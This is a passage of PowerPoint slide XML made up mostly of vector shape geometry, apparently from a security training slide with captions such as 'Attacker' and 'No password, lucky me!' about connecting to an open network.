                      <a:gd name="T6" fmla="*/ 16 w 120"/>
                      <a:gd name="T7" fmla="*/ 33 h 33"/>
                      <a:gd name="T8" fmla="*/ 0 w 120"/>
                      <a:gd name="T9" fmla="*/ 28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33">
                        <a:moveTo>
                          <a:pt x="0" y="28"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="101" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="120" y="5"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="16" y="3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rgbClr val="8E47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20" name="Freeform 119">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC411C8-4681-410E-BC64-3AC697735D0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2057" y="2672"/>
                  <a:ext cx="32" cy="153"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 55"/>
                    <a:gd name="T1" fmla="*/ 0 h 265"/>
                    <a:gd name="T2" fmla="*/ 14 w 55"/>
                    <a:gd name="T3" fmla="*/ 22 h 265"/>
                    <a:gd name="T4" fmla="*/ 5 w 55"/>
                    <a:gd name="T5" fmla="*/ 239 h 265"/>
                    <a:gd name="T6" fmla="*/ 29 w 55"/>
                    <a:gd name="T7" fmla="*/ 265 h 265"/>
                    <a:gd name="T8" fmla="*/ 52 w 55"/>
                    <a:gd name="T9" fmla="*/ 253 h 265"/>
                    <a:gd name="T10" fmla="*/ 38 w 55"/>
                    <a:gd name="T11" fmla="*/ 29 h 265"/>
                    <a:gd name="T12" fmla="*/ 55 w 55"/>
                    <a:gd name="T13" fmla="*/ 15 h 265"/>
                    <a:gd name="T14" fmla="*/ 0 w 55"/>
                    <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="239"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="265"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="253"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5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40505"/>
                </a:solidFill>
                <a:ln w="6350" cap="flat">
                  <a:solidFill>
                    <a:schemeClr val="bg1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13" name="Group 120">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A2AB8A-27F5-4517-B4FB-87C64E2B79A0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1658" y="2536"/>
                <a:ext cx="326" cy="637"/>
                <a:chOff x="3960" y="782"/>
                <a:chExt cx="326" cy="637"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2114" name="Freeform 121">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75ABDA41-F2E8-4EF3-B5C6-651E0B5642B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4028" y="1088"/>
                  <a:ext cx="121" cy="331"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 90 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 90 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 11 h 245"/>
                    <a:gd name="T10" fmla="*/ 3 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 44 w 90"/>
                    <a:gd name="T17" fmla="*/ 205 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 40 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 44 w 90"/>
                    <a:gd name="T25" fmla="*/ 205 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 89 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="6"/>
                        <a:pt x="90" y="6"/>
                        <a:pt x="90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  <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5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9"/>
                        <a:pt x="44" y="225"/>
                        <a:pt x="44" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="171"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="47"/>
                        <a:pt x="36" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="47"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="171"/>
                        <a:pt x="44" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="207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9" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="201"/>
                        <a:pt x="89" y="171"/>
                        <a:pt x="89" y="15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15" name="Freeform 122">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC03C68-BAD0-4839-BA0B-6CD26DB6676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3960" y="866"/>
                  <a:ext cx="326" cy="257"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 201 w 241"/>
                    <a:gd name="T1" fmla="*/ 107 h 190"/>
                    <a:gd name="T2" fmla="*/ 179 w 241"/>
                    <a:gd name="T3" fmla="*/ 113 h 190"/>
                    <a:gd name="T4" fmla="*/ 169 w 241"/>
                    <a:gd name="T5" fmla="*/ 49 h 190"/>
                    <a:gd name="T6" fmla="*/ 169 w 241"/>
                    <a:gd name="T7" fmla="*/ 49 h 190"/>
                    <a:gd name="T8" fmla="*/ 143 w 241"/>
                    <a:gd name="T9" fmla="*/ 24 h 190"/>
                    <a:gd name="T10" fmla="*/ 100 w 241"/>
                    <a:gd name="T11" fmla="*/ 13 h 190"/>
                    <a:gd name="T12" fmla="*/ 60 w 241"/>
                    <a:gd name="T13" fmla="*/ 2 h 190"/>
                    <a:gd name="T14" fmla="*/ 30 w 241"/>
                    <a:gd name="T15" fmla="*/ 12 h 190"/>
                    <a:gd name="T16" fmla="*/ 4 w 241"/>
                    <a:gd name="T17" fmla="*/ 159 h 190"/>
                    <a:gd name="T18" fmla="*/ 36 w 241"/>
                    <a:gd name="T19" fmla="*/ 168 h 190"/>
                    <a:gd name="T20" fmla="*/ 54 w 241"/>
                    <a:gd name="T21" fmla="*/ 47 h 190"/>
                    <a:gd name="T22" fmla="*/ 53 w 241"/>
                    <a:gd name="T23" fmla="*/ 164 h 190"/>
                    <a:gd name="T24" fmla="*/ 62 w 241"/>
                    <a:gd name="T25" fmla="*/ 175 h 190"/>
                    <a:gd name="T26" fmla="*/ 113 w 241"/>
                    <a:gd name="T27" fmla="*/ 189 h 190"/>
                    <a:gd name="T28" fmla="*/ 140 w 241"/>
                    <a:gd name="T29" fmla="*/ 169 h 190"/>
                    <a:gd name="T30" fmla="*/ 138 w 241"/>
                    <a:gd name="T31" fmla="*/ 88 h 190"/>
                    <a:gd name="T32" fmla="*/ 137 w 241"/>
                    <a:gd name="T33" fmla="*/ 75 h 190"/>
                    <a:gd name="T34" fmla="*/ 137 w 241"/>
                    <a:gd name="T35" fmla="*/ 76 h 190"/>
                    <a:gd name="T36" fmla="*/ 138 w 241"/>
                    <a:gd name="T37" fmla="*/ 80 h 190"/>
                    <a:gd name="T38" fmla="*/ 138 w 241"/>
                    <a:gd name="T39" fmla="*/ 82 h 190"/>
                    <a:gd name="T40" fmla="*/ 138 w 241"/>
                    <a:gd name="T41" fmla="*/ 87 h 190"/>
                    <a:gd name="T42" fmla="*/ 138 w 241"/>
                    <a:gd name="T43" fmla="*/ 88 h 190"/>
                    <a:gd name="T44" fmla="*/ 138 w 241"/>
                    <a:gd name="T45" fmla="*/ 88 h 190"/>
                    <a:gd name="T46" fmla="*/ 144 w 241"/>
                    <a:gd name="T47" fmla="*/ 121 h 190"/>
                    <a:gd name="T48" fmla="*/ 144 w 241"/>
                    <a:gd name="T49" fmla="*/ 123 h 190"/>
                    <a:gd name="T50" fmla="*/ 144 w 241"/>
                    <a:gd name="T51" fmla="*/ 123 h 190"/>
                    <a:gd name="T52" fmla="*/ 144 w 241"/>
                    <a:gd name="T53" fmla="*/ 127 h 190"/>
                    <a:gd name="T54" fmla="*/ 153 w 241"/>
                    <a:gd name="T55" fmla="*/ 147 h 190"/>
                    <a:gd name="T56" fmla="*/ 167 w 241"/>
                    <a:gd name="T57" fmla="*/ 153 h 190"/>
                    <a:gd name="T58" fmla="*/ 214 w 241"/>
                    <a:gd name="T59" fmla="*/ 139 h 190"/>
                    <a:gd name="T60" fmla="*/ 201 w 241"/>
                    <a:gd name="T61" fmla="*/ 107 h 1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241" h="190">
                      <a:moveTo>
                        <a:pt x="201" y="107"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="108"/>
                        <a:pt x="191" y="110"/>
                        <a:pt x="179" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="174" y="85"/>
                        <a:pt x="170" y="58"/>
                        <a:pt x="169" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="169" y="49"/>
                        <a:pt x="169" y="49"/>
                        <a:pt x="169" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="166" y="32"/>
                        <a:pt x="151" y="27"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="10"/>
                        <a:pt x="69" y="4"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="4"/>
                        <a:pt x="30" y="12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1"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="158"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="122"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="174"/>
                        <a:pt x="62" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="189"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="181"/>
                        <a:pt x="140" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="141"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="82"/>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="137" y="75"/>
                        <a:pt x="137" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="77"/>
                        <a:pt x="137" y="79"/>
                        <a:pt x="138" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="84"/>
                        <a:pt x="138" y="85"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="87"/>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="96"/>
                        <a:pt x="141" y="108"/>
                        <a:pt x="144" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="122"/>
                        <a:pt x="144" y="122"/>
                        <a:pt x="144" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="123"/>
                        <a:pt x="144" y="123"/>
                        <a:pt x="144" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="127"/>
                        <a:pt x="144" y="127"/>
                        <a:pt x="144" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="137"/>
                        <a:pt x="149" y="143"/>
                        <a:pt x="153" y="147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="151"/>
                        <a:pt x="161" y="152"/>
                        <a:pt x="167" y="153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="181" y="149"/>
                        <a:pt x="197" y="144"/>
                        <a:pt x="214" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="241" y="131"/>
                        <a:pt x="225" y="99"/>
                        <a:pt x="201" y="10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16" name="Freeform 123">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B43A188C-F419-4F09-8795-D587E920DEC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4047" y="852"/>
                  <a:ext cx="89" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 22 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 12 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="10" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="15"/>
                        <a:pt x="16" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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1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17" name="Oval 124">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E569932B-77EA-4058-88ED-B8DA7EB84206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gray">
                <a:xfrm flipH="1">
                  <a:off x="4038" y="782"/>
                  <a:ext cx="106" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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91" name="Group 1461">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7658D37C-8F16-4FDC-8E5D-03CE8B3621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25274" y="2005113"/>
              <a:ext cx="657225" cy="196850"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2107" name="Freeform 1462">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3DCA8A-32FA-4EEB-AC81-9B9801C06DF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58" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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8" name="Freeform 1463">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B95826A-5ACC-4540-B750-928EFD70311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240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0070C0"/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9" name="Freeform 1464">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35DE3877-D757-41C1-B143-FE5EA506E28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240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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10" name="Freeform 1465">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A81A421-381D-4540-A7BE-98C640FF30A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48" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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11" name="Freeform 1466">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF7CA87-667F-478B-9190-9552CAFF73A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104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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092" name="Group 2091">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C507A2-EE53-49E0-8B58-79FB2136407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715522" y="2251379"/>
              <a:ext cx="2324078" cy="2320621"/>
              <a:chOff x="15546" y="790137"/>
              <a:chExt cx="2422856" cy="2419247"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2100" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8888FC17-6713-416B-B77B-0164072D46D0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5546" y="790137"/>
                <a:ext cx="2422856" cy="2419247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1" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD5E18CF-9F9B-4B3E-80AE-E9D3F0070D4A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74661" y="949015"/>
                <a:ext cx="2104626" cy="2101491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2" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B97B7BFC-0F4C-46CF-9C95-0C768CEB65D9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342017" y="1116120"/>
                <a:ext cx="1769914" cy="1767278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3" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C78CB33-8725-4466-B909-594282C132D0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509372" y="1283225"/>
                <a:ext cx="1435203" cy="1433065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4" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78ED78D5-B913-4DC5-A26E-A077D89682CC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676729" y="1450334"/>
                <a:ext cx="1100491" cy="1098852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5" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D7712C-11A3-49CF-8B81-038EEF19F70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860669" y="1633997"/>
                <a:ext cx="732611" cy="731519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6" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADD7A33-73E3-46F7-B1C7-A577D64EB3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1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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2093" name="Text Box 1432">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28352A0-2CD9-4379-9BCB-B5661C40DC41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10436984" y="3979491"/>
              <a:ext cx="896079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Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2094" name="Rectangle 2093">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5855E60C-B483-42E3-96E1-DEFA11BA9E8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9164366" y="3015258"/>
              <a:ext cx="1213475" cy="707886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Connecting </a:t>
              </a:r>
              <a:b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</a:b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to </a:t>
              </a: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certifiedhacker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No password, </a:t>
              </a:r>
              <a:b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</a:b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lucky me!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2095" name="Picture 2094">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3EFAB79-75B3-4BA7-844B-3FBA2616E7A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331814" y="2541996"/>
              <a:ext cx="1079123" cy="1472362"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
